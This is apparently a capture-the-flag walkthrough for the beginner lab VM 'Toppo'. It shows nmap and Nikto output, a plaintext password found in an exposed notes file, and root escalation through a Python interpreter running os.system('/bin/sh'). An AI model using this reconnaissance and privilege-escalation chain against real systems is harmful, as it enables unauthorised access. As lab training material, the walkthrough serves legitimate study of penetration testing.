The Machine isn't hard to own and don't require advanced exploitation . Level : Beginner DHCP : activated Inside the zip you will find a vmdk file , and I think you will be able to use it with any usual virtualization software ( tested with Virtualbox) . If you have any question : my twitter is @h4d3sw0rm Happy Hacking !
Netdiscover
192.168.0.43
nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14
➜ ~ nmap -sV -p- 192.168.0.43 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 10:58 CET Nmap scan report for 192.168.0.43 Host is up (0.011s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 56317/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.26 seconds
22, 80, 111, 56317
Port 80
Nikto
1 2 3 4 5 6 7 8
+ OSVDB-3268: /admin/: Directory indexing found. + OSVDB-3092: /admin/: This might be interesting... + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3268: /mail/: Directory indexing found. + OSVDB-3092: /mail/: This might be interesting... + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /manual/images/: Directory indexing found.
In the admin directory we have one file, notes.txt:
1 2 3
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
ted@Toppo:/home$ python Python 2.7.9 (default, Aug 13 2016, 16:41:35) [GCC 4.9.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import os; os.system("/bin/sh") # id uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth) # whoami root